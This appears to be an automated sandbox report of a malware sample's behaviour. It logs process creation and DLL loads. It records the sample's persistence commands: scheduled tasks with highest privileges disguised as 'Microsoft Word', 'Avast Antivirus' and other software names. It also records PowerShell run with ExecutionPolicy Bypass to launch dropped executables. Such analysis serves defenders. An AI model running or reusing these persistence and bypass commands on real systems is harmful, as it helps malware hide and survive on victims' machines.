Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: netfxperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: esentprf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfts.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msdtcuiu.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: msscntrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfproc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: sysmain.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: rasctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: tapiperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Section loaded: perfctrs.dll	Jump to behavior
